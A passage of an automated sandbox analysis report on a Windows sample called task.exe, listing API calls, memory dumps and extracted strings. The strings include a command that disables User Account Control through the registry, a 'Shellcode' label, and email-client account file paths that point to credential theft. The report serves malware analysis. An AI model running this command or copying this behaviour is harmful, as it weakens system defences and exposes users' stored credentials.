                                                                                                                                                                • CloseHandle.KERNEL32(000C278C,?,?,?,?,?,?,?,?,?,?,?,?,?,0006DD38,00000027), ref: 00067299
                                                                                                                                                                Strings
                                                                                                                                                                • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 0006727B
                                                                                                                                                                • Shellcode, xrefs: 00067248
                                                                                                                                                                • C:\Windows\System32\cmd.exe, xrefs: 00067280
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseHandle$CreateProcess
                                                                                                                                                                • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe$Shellcode
                                                                                                                                                                • API String ID: 2922976086-1392599029
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                APIs
                                                                                                                                                                • __allrem.LIBCMT ref: 025880A1
                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 025880BD
                                                                                                                                                                • __allrem.LIBCMT ref: 025880D4
                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 025880F2
                                                                                                                                                                • __allrem.LIBCMT ref: 02588109
                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02588127
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4495447446.0000000002550000.00000040.00001000.00020000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_2550000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1992179935-0
                                                                                                                                                                APIs
                                                                                                                                                                • __allrem.LIBCMT ref: 00098636
                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00098652
                                                                                                                                                                • __allrem.LIBCMT ref: 00098669
                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00098687
                                                                                                                                                                • __allrem.LIBCMT ref: 0009869E
                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000986BC
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1992179935-0
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4495447446.0000000002550000.00000040.00001000.00020000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_2550000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _free
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 269201875-0
                                                                                                                                                                APIs
                                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,10006FFD,00000000,?,?,?,10008A72,?,?,00000100), ref: 1000887B
                                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,10008A72,?,?,00000100,5EFC4D8B,?,?), ref: 10008901
                                                                                                                                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 100089FB
                                                                                                                                                                • __freea.LIBCMT ref: 10008A08
                                                                                                                                                                  • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                                                                                                                • __freea.LIBCMT ref: 10008A11
                                                                                                                                                                • __freea.LIBCMT ref: 10008A36
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498041205.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4497988151.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498041205.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_10000000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1414292761-0
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4495447446.0000000002550000.00000040.00001000.00020000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_2550000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: __cftoe
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 4189289331-0
                                                                                                                                                                APIs
                                                                                                                                                                • TlsGetValue.KERNEL32(00000003), ref: 6FE8057E
                                                                                                                                                                • TlsGetValue.KERNEL32(00000003), ref: 6FE805A2
                                                                                                                                                                • TlsSetValue.KERNEL32(00000000,00000000), ref: 6FE80600
                                                                                                                                                                • TlsGetValue.KERNEL32(00000000), ref: 6FE80661
                                                                                                                                                                • TlsGetValue.KERNEL32(00000000), ref: 6FE80683
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Value
                                                                                                                                                                • String ID: 1o
                                                                                                                                                                • API String ID: 3702945584-528613903
                                                                                                                                                                APIs
                                                                                                                                                                • _strlen.LIBCMT ref: 10001607
                                                                                                                                                                • _strcat.LIBCMT ref: 1000161D
                                                                                                                                                                • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,1000190E,?,?,00000000,?,00000000), ref: 10001643
                                                                                                                                                                • lstrcatW.KERNEL32(?,?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 1000165A
                                                                                                                                                                • lstrlenW.KERNEL32(?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 10001661
                                                                                                                                                                • lstrcatW.KERNEL32(00001008,?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 10001686
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498041205.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4497988151.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498041205.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_10000000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: lstrcatlstrlen$_strcat_strlen
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1922816806-0
                                                                                                                                                                APIs
                                                                                                                                                                • lstrcatW.KERNEL32(?,?,?,?,?,00000000), ref: 10001038
                                                                                                                                                                • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 1000104B
                                                                                                                                                                • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 10001061
                                                                                                                                                                • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 10001075
                                                                                                                                                                • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 10001090
                                                                                                                                                                • lstrlenW.KERNEL32(?,?,?,00000000), ref: 100010B8
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498041205.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4497988151.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498041205.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_10000000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: lstrlen$AttributesFilelstrcat
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3594823470-0
                                                                                                                                                                APIs
                                                                                                                                                                • GetLastError.KERNEL32(?,?,10003518,100023F1,10001F17), ref: 10003864
                                                                                                                                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 10003872
                                                                                                                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 1000388B
                                                                                                                                                                • SetLastError.KERNEL32(00000000,?,10003518,100023F1,10001F17), ref: 100038DD
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498041205.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4497988151.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498041205.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_10000000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3852720340-0
                                                                                                                                                                APIs
                                                                                                                                                                • GetLastError.KERNEL32(00000001,?,6FE93F31,6FE90F0A,6FE908EE,?,6FE90B26,?,00000001,?,?,00000001,?,6FEBB280,0000000C,6FE90C1F), ref: 6FE9416D
                                                                                                                                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6FE9417B
                                                                                                                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6FE94194
                                                                                                                                                                • SetLastError.KERNEL32(00000000,6FE90B26,?,00000001,?,?,00000001,?,6FEBB280,0000000C,6FE90C1F,?,00000001,?), ref: 6FE941E6
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3852720340-0
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                • assertion failed: len >= mem::size_of::<c::sockaddr_in6>(), xrefs: 6FE778E3, 6FE77900
                                                                                                                                                                • assertion failed: len >= mem::size_of::<c::sockaddr_in>(), xrefs: 6FE7791D, 6FE7795A
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: freeaddrinfo
                                                                                                                                                                • String ID: assertion failed: len >= mem::size_of::<c::sockaddr_in6>()$assertion failed: len >= mem::size_of::<c::sockaddr_in>()
                                                                                                                                                                • API String ID: 2731292433-2053607270
                                                                                                                                                                APIs
                                                                                                                                                                • GetLastError.KERNEL32(?,?,10006C6C), ref: 10005AFA
                                                                                                                                                                • _free.LIBCMT ref: 10005B2D
                                                                                                                                                                • _free.LIBCMT ref: 10005B55
                                                                                                                                                                • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B62
                                                                                                                                                                • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B6E
                                                                                                                                                                • _abort.LIBCMT ref: 10005B74
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498041205.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4497988151.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498041205.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_10000000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorLast$_free$_abort
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3160817290-0
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                                                                                                                                                                  • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,?,?,100010DF,?,?,?,00000000), ref: 10001EAC
                                                                                                                                                                  • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                                                                                                                                                                  • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                                                                                                                                                                  • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,100010DF,?,100010DF,?,?,?,00000000), ref: 10001ED3
                                                                                                                                                                • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 1000122A
                                                                                                                                                                  • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001855
                                                                                                                                                                  • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001869
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498041205.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4497988151.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498041205.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_10000000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: lstrlen$_strlenlstrcat$AttributesFile
                                                                                                                                                                • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                                                                                                                                • API String ID: 4036392271-1520055953
                                                                                                                                                                • Opcode ID: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
                                                                                                                                                                • Instruction ID: e2b7c7e1c3038021adfe9ab266432482c710e64fc4cfb1bae4cfd9c1521b4980
                                                                                                                                                                • Opcode Fuzzy Hash: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
                                                                                                                                                                • Instruction Fuzzy Hash: 4B21D579E142486AFB14D7A0EC92FED7339EF80754F000556F604EB1D5EBB16E818758
                                                                                                                                                                APIs
                                                                                                                                                                • WaitOnAddress.API-MS-WIN-CORE-SYNCH-L1-2-0(6FE7AFD9,?,00000004,000000FF,6FE80A00,FFFFFFFF,?,?,6FE7AFD9,6FED3BF4), ref: 6FEA52BB
                                                                                                                                                                • GetLastError.KERNEL32(?,6FE7AFD9,6FED3BF4), ref: 6FEA52C2
                                                                                                                                                                Strings
                                                                                                                                                                • To, xrefs: 6FEA52FE
                                                                                                                                                                • \o(, xrefs: 6FEA5321
                                                                                                                                                                • ()/rustc/aa1c45908df252a5b0c14e1bcb38c6c55ae02efe\library\core\src\io\borrowed_buf.rs, xrefs: 6FEA5313
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressErrorLastWait
                                                                                                                                                                • String ID: ()/rustc/aa1c45908df252a5b0c14e1bcb38c6c55ae02efe\library\core\src\io\borrowed_buf.rs$To$\o(
                                                                                                                                                                • API String ID: 1574541344-1974936466
                                                                                                                                                                • Opcode ID: d2da478a8bbab971150e093fd422429de2cd7c6a4bde83bbdef7d2e0bbe36edd
                                                                                                                                                                • Instruction ID: 75ca361abff078e90f4358e911bdbd1dc0b5120739b45ffb9d625e22eb59bdac
                                                                                                                                                                • Opcode Fuzzy Hash: d2da478a8bbab971150e093fd422429de2cd7c6a4bde83bbdef7d2e0bbe36edd
                                                                                                                                                                • Instruction Fuzzy Hash: 332182305443048BDB148A688854BA97BB1AF8633CF740B5EE9659F3D8E637684287A1
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: C:\Users\user\task.exe
                                                                                                                                                                • API String ID: 0-325489873
                                                                                                                                                                • Opcode ID: ac9705b1bc9c7477b7e28e5d77e674fecc20898a348b98d9dbe650d232672c90
                                                                                                                                                                • Instruction ID: 3eee9cbe02167be982fe9de5628e8f1edd3778168b424cdb25f1d537b8f01026
                                                                                                                                                                • Opcode Fuzzy Hash: ac9705b1bc9c7477b7e28e5d77e674fecc20898a348b98d9dbe650d232672c90
                                                                                                                                                                • Instruction Fuzzy Hash: 09214F71A05209AFD7109F759D9095B7FAEEF4236C7204B29E924DB2A0D730FE518770
                                                                                                                                                                APIs
                                                                                                                                                                • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0006A2EA), ref: 0006A249
                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,?,?,0006A2EA), ref: 0006A258
                                                                                                                                                                • Sleep.KERNEL32(00002710,?,?,?,0006A2EA), ref: 0006A285
                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,0006A2EA), ref: 0006A28C
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: File$CloseCreateHandleSizeSleep
                                                                                                                                                                • String ID: !
                                                                                                                                                                • API String ID: 1958988193-891483820
                                                                                                                                                                • Opcode ID: 18b04de977e59bd824baf31df3c32e941770c56c8e13e8f69ae67434af13accd
                                                                                                                                                                • Instruction ID: 0046bc7dae06502ae4c423d6f6743d2dd42f5840e113fc787f1a5cdc922f9f3d
                                                                                                                                                                • Opcode Fuzzy Hash: 18b04de977e59bd824baf31df3c32e941770c56c8e13e8f69ae67434af13accd
                                                                                                                                                                • Instruction Fuzzy Hash: 481199303856416AF6A0B7689CE9A6F3BDBAB23310F00051DF64253A92C62F5848CB37
                                                                                                                                                                APIs
                                                                                                                                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,8C5F75A1,00000000,?,00000000,6FEA5C90,000000FF,?,6FE9798D,?,?,6FE97961,?), ref: 6FE97A28
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6FE97A3A
                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,00000000,6FEA5C90,000000FF,?,6FE9798D,?,?,6FE97961,?), ref: 6FE97A5C
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                • API String ID: 4061214504-1276376045
                                                                                                                                                                • Opcode ID: a1abdd362a32b26ec359d22432869da0926c12af92692529c57b4ce29f351241
                                                                                                                                                                • Instruction ID: 6635c5c119581686ccee3aa35a586591564f1fbae1613c0a72ee723fcb156765
                                                                                                                                                                • Opcode Fuzzy Hash: a1abdd362a32b26ec359d22432869da0926c12af92692529c57b4ce29f351241
                                                                                                                                                                • Instruction Fuzzy Hash: 99016731914A55EFDB018F94CC05FAEBFB9FB47725F10452AE821A2680EB759914CA50
                                                                                                                                                                APIs
                                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 0006D0B7
                                                                                                                                                                • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0006D0F6
                                                                                                                                                                  • Part of subcall function 00092FE3: _Yarn.LIBCPMT ref: 00093002
                                                                                                                                                                  • Part of subcall function 00092FE3: _Yarn.LIBCPMT ref: 00093026
                                                                                                                                                                • std::bad_exception::bad_exception.LIBCMT ref: 0006D10E
                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0006D11C
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
